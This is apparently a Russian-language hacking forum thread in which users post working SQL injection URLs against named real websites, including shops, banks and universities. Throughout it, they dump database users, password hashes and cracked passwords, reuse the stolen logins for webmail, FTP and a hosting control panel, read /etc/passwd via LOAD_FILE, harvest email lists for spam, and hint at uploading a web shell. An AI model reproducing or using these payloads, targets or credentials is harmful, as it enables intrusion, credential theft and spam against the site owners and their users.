http://b-s.com.ua/cgi-bin/catalog.pl?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11,12+from+z akaz/*

to Joker-jar

http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(database(),char(58), user(),Char(58),version()),6,7,8,9,10,11,12,13,14, 15,16,17/*

2 Grey & Joker-jar
http://ad-store.ru/gorod/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17+from+gorod_users/*
с именами столбцов, думаю, вы разберетесь

http://www.2msk.ru/?module=food&id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11,12,13,14, 15,16,17/*

http://www.selfserviceworld.com/article.php?id=-16816%20union%20select%20id,concat_ws(char(58),nam e,email,password),3,4,5,6,7,8%20from%20users/*
admin:dbcc4a47bc32b0e84903c632fb0dc08c => admin:lackawanna
http://www.selfserviceworld.com/article.php?id=-16816%20union%20select%201,concat(user,char(58),pa ssword),3,4,5,6,7,8%20from%20mysql.user/*
root:54a43983056d0aa5 => root:f00bar
Админка - /admin. Залогиниться не могу ((

Идем дальше:
http://www.mcpost.com/article.php?id=-295%20union%20select%201,2,id,concat(username,char (58),password),5,6,7,8,9,0,11,12%20from%20users/*
mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((

И спам листы если кому нужны:
http://www.fdr.com.ua/article.php?id=-3888%20union%20select%201,concat(name,char(58),ema il),3,4,5,6,7,8%20from%20forum/*

__:)__

mcpost:242d048c07a9cbb3c0f8895019cd9253 => mcpost:489hbc
Админку найти не могу((
можно в webmail зайти
http://www.mcpost.com/webmail
а можно и в Control Panel хостера)
https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index
логин/пасс те же

можно в webmail зайти
http://www.mcpost.com/webmail
а можно и в Control Panel хостера)
https://mmm2624.sbc-webhosting.com/cgi-bin/authApp?msg=LOGIN&redirect=/cgi-bin/secure/index
логин/пасс те же

+ ftp
ftp://mcpost:0489hbc@mcpost.com

+++++
http://www.sader.org.tr/uyeler_detay.asp?id=2189768%20union%20select%200,a d,2,email,url,resim,firma,unvan,8,adres,telefon,fa x,12,13,14,15,16,17%20from%20uyeler%20where%20id=I D

меняем ID и инфо.
панели нетy или вроде ето только Members

http://www.hurriyetusa.com/haber/haber_detay.asp?id=973068465%20union%20select%200, 1,2,3,4,5,6,7,8%20from%20admin

Help

http://www.panasonic.com.tr/urun_detay.asp?proid=633'%20union%20select%200,1,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27%20from%20users
помогите со 2 ым :)

Т.к. скуля выводит все записи (все строки), то там где много ограничил её лимитом с 0 по 15 запись:

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),cha r(58),user(),char(58),version())/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,table_name+from+infor mation_schema.tables+limit+0,15/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,c har(58),column_name)+from+information_schema.colum ns+where+table_name=char(110,101,117,95,117,115,10 1,114,115)/*
http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(id,char(58),lo gin,char(58),password,char(58),name,char(58),email )+from+bers.neu_users/*

http://www.spsavto.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,concat(table_schema,c har(58),column_name)+from+information_schema.colum ns+where+table_name=char(97,100,109,105,110,115)+l imit+0,15/*


http://www.istrodina.com/rodina_articul.php3?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11,12,13,14/*

<noindex>
www.diamantbank.ua


http://www.diamantbank.ua/?el_id=-1+union+select+passwd+from+users/*

</noindex>

Очень давно выкладывал, но то была просто скуля без запроса...

http://shkola.lv/index.php?mode=wgoods&page=uroki&lsnid=13+UNION+SELECT+1,concat(user_icq,0x3a,user_ password),3,4,5+from+forum_users+where+user_icq+%3 C%3E+0/*

*****

Вот тут дальше не продвинулся, если кто будет смотреть - отпишитесь че да как...

http://www.sims2club.ru/news/?action=edit&list=&onpage=-1

Давненько не выкладывал =(
http://www.simpleprinciples.com/main/main.html?Id=7+union+select+1,2,3,4,concat_ws(char (58),version(),database(),user())/*

Shoping
http://www.10dance.it/shop/pagine.php?id=-9+union+select+1,user(),3,4/* http://www.euroinf.it/shop/shop.php?id=-86+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(data base(),0x71),0x71),5,6,7,8/* http://shop.colinmcraesport.com/item.php?id=-8+union+select+1,2,3,4,5,6,LOAD_FILE(0x2f6574632f7 06173737764),8,9,10,11,12,13,14,15,16,17,18,19,20, 21/* http://www.kbmedien.ch/shop/bestellform.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/* http://www.vlp-aspan.ch/de/shop/category.php?id=-6+union+select+concat(user_password,0x3a,user_name )+from+users+limit+13,1/* перебор юзеров лимитом

www.ukma.kiev.ua

Национальный Университет Киево-Могилянской Академии


падлюки, не взяли меня =( пусть терь локти грызут :)

http://www.ukma.kiev.ua/news/news_detailed.php?id=-1+union+select+1,2,3,concat(username,char(58),user _password),5,6,7,8,9,10,11,12,13,14,15,16+from+php bb_users/*

http://www.ukrinfo.net/s.p?g=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*
http://www.ukrinfo.net/s.p?g=-1+union+select+table_name+from+information_schema. tables+limit+17,1/*
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column _name)+from+information_schema.columns+where+table _name=char(65,100,109,105,110)+limit+0,1/*
http://www.ukrinfo.net/s.p?g=-1+union+select+concat(table_schema,char(58),column _name)+from+information_schema.columns+where+table _name=char(99,111,110,116,114,111,108)+limit+0,1/*

http://www.uvacres.org/faculty_page.php?id=-12+union+select+1,user,3,4,password,6,7,8,9,10,11, 12+from+users
0_o
upd
http://www.israellawcenter.org/articlenav.php?id=-7+union+select+1,2,3,4,version(),6,7

www.avtozazbank.com


http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

2Ksander
http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,concat(user_name,0x3a ,user_pass),9+from+users/*

www.avtozazbank.com


http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,convert(user_name+usi ng+latin1),convert(user_pass+using+latin1)+from+us ers/*

Вот тут дальше не продвинулся, если кто будет смотреть - отпишитесь че да как...
http://www.sims2club.ru/news/?action=edit&list=&onpage=-1
http://www.sims2club.ru/download/forhouse/details?id=-5150+union+select+1,2,3,4,5,6,7,8/*
вот немножко в другом месте ;)

http://www.kollaboration.org/videos-detail1.php?id=-6+union+select+1,2,version(),4,5,6
0_o

http://www.build.kz/index.php?page=inc/firm&subcid=9&cid=102&fid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23/*

http://www.sunset-shop.net/boutique/achat/index.php?id=-37+union+select+1,version()/*
http://www.ergopix.com/c3/shop/achat/index.php?id=-22+union+select+1,LOAD_FILE(0x2f6574632f7061737377 64),3,4/*

Юзера не подобрал:
http://stopusa.be/scripts/texte.php?section=&langue=3&id=-25094+union+select+1,2,passwd,4,5,6,7,8,9,10+from+ users/*

http://rain.t-l.ru/index.php?artID=-179+union+select+1,0x4d617873746572,3,4/*
может кому надо

http://www.motocentr.com.ua/news_one.php?n=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5/*
http://www.motocentr.com.ua/news_one.php?n=-1+union+select+1,2,table_name,4,5+from+information _schema.tables/*

http://www.tourshow.ru/hotels/hdescr.php?hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(database(),char(58),user(),char(58),version() ),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

http://pvl16.stitcher.ru/patterns/?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*

http://www.zoo.volganin.net/ind.php?id_categ=-1+union+select+1,2,3,4,5,convert(concat(database() ,char(58),user(),char(58),version()),char),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/*

http://www.britfilms.tv/index.php?id=-5+union+select+version(),2/*
http://www.cloob.com/web/index.php?mode=cat&id=6&parent_id=-7+union+select+1,version(),3,4,5,6,7/*

shoping
http://www.oktava-shop.com/view_prod.php?id=-89+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13, 14+from+admin/*
http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+ 29,1/* http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,LOAD_FILE(0x2f6574632f7061737 37764),5,6,7,8,9,10,11,12,13,14,15,16/*

http://www.bukvite.com/poem.php?docid=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11,12/*

http://www.radiookapi.net/article.php?id=7093%20union%20select%201,id,3,4,5, 6,7,8,9,0,11,12,131,14,15,16,17,18,19,concat(login ,char(58),password)%20from%20radiookapi001.user/*

http://www.radiookapi.net/article.php?id=7093%20union%20select%201,id,3,4,5, 6,7,8,9,0,11,12,131,14,15,16,17,18,19,concat(login ,char(58),email,char(58),passwd)%20from%20radiooka pi002.user/*

__:)__

Ейск - город герой
http://www.yeisk.ru/catalog/_jump.cfm?ID=93'

http://metromir.ru/weather.php?cityid=1'+union+select+version()/*
Полазьте поглубже, у кого есть время...

http://metromir.ru/weather.php?cityid=1'+union+select+version()/*
Полазьте поглубже, у кого есть время...
для начала:
http://metromir.ru/weather.php?cityid=1'+union+select+concat(user,0x3 a,password)+from+mysql.user/*
root:447a27ec3f4a0108

http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8,9/*
http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(firma,char(58),kna me,char(58),tel,char(58),mail),7,8,9+from+mail+lim it+0,1/*

http://www.informatics.ru/viewproblem.php?problem_id=101&round_id=-1+union+select+1,2,database(),version(),5,6,7,8,co ncat(user,char(58),password),10+from+mysql.user/*

http://e-catalog.rusbiz.ru/1'.html
Горе mod-rewrite'еры...

хз выкладывал кто нет,полностью раздроченная скуля ;)
http://www.kalinka.ru/reports/?show_photo=-52+union+select+1,2,3,4,5,6/*
так же есть права на чтение и запись, но чтение осложнялось тем что вывод ограничен в несколько символов смотреть конфиги через substring например мой мозк просто не выдержал,поэтому был найден методом тыка путь /home/www/htdocs/ ,думаю папку для заливки шелла сами найдете ;) юзайте на здоровье.

http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,pw,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,0x697427732061646d696e,24 ,25,26,27,user,29,30+from+users/*
c помощью лимита можно крутить
http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,mysql.user.password,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x4d7953 514c2070617373,24,25,26,27,user,29,30+from+mysql.u ser/*
пасс от базы(не разломал)

http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,LOAD_FILE(0x2f6574632f7061737 37764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,0x2f6574632f706173737764,29 ,30/*
/etc/passwd